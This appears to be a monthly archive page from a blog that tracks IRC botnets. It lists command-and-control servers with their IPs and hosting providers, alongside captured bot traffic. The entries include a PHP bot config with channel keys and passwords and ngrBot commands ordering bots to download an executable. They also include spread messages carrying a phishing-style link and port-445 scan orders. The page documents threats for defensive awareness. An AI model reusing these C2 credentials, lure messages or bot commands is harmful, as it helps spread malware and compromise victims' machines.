Month: April 2011

196.212.26.149(linux botnet hosted in South Africa Cape Town Afrinic)

Uncategorized

var $config = array(“server”=>”196.212.26.149”, “port”=>6667, “pass”=>””, // “prefix”=>””, “maxrand”=>7, “chan”=>”#botovi”, “key”=>”123456”, // “modes”=>”-x+i”, “password”=>”botko”, // “trigger”=>”!say@”, “hostauth”=>”*” // * infos about hosting: http://whois.domaintools.com/196.212.26.149

72.55.132.187(irc botnet hosted in Canada Zenkis.ca)

Uncategorized

Remote Host Port Number 213.251.170.52 80 72.55.132.187 2603 PASS ngrBot NICK n{US|XPa}pszjwcb USER pszjwcb 0 0 :pszjwcb JOIN #phcrulez ngrBot * Now talking in #phcrulez * Topic is ” * Set by Ko0l on Mon Apr 11 01:39:26 infos about hosting: http://whois.domaintools.com/72.55.132.187

abc.radiozeri.de(irc botnet hosted in Taiwan Taipei Taiwan Fixed Network Co. Ltd)

Uncategorized

Dns resolved abc.radiozeri.de to 61.31.99.67 ircd: 61.31.99.67:81 chanel: #sos# * Now talking in #sos# * Topic is ” * Set by mofo on Mon Apr 25 14:58:51 .s /99/106/112/81/55/59/40/104/113/121/35/102/121/51/113/98/117/109/126/122/102/124/38/86/75/119/107/117/121/58/43/62/48/55/51/16/48/50/ mx (r00t@bossman) Quit (Ping timeout) UPDATE: Remote Host Port Number 195.122.131.7 80 213.251.170.52 80 59.76.142.100 4042 PASS ngrBot JOIN #US JOIN #new PRIVMSG #boss :[d=”http://rapidshare.com/files/460738009/sos.exe”] ErrorRead more...

115.146.19.158(irc botnet hosted in Japan Tokyo Kddi Web Communications Inc)

Uncategorized

Remote Host Port Number 115.146.19.158 4042 PASS ngrBot 213.251.170.52 80 JOIN #US NICK n{US|XPa}iqwtaan USER iqwtaan 0 0 :iqwtaan JOIN #boss ngrBot PRIVMSG #boss :[HTTP]: Updated HTTP spread interval to “6” PRIVMSG #boss :[HTTP]: Updated HTTP spread message to “wow album 🙂 http://tiny.cc/facebook-photos-24042011” PRIVMSG #boss :[MSN]: Updated MSN spread interval to “6” PRIVMSG #boss :[MSN]:Read more...

46.45.156.126(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)

Uncategorized

Remote Host Port Number 192.168.146.2 445 46.45.156.126 81 ircd here 74.206.242.164 80 NICK [N00_USA_XP_1986626] PRIVMSG [N00_USA_XP_1986 @ :scan; Sequential Port Scan started on 192.168.146.0:445 with a delay of 5 seconds for 0 minutes using 10 threads. USER SP2-189 * 0 :COMPUTERNAME @ :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 secondsRead more...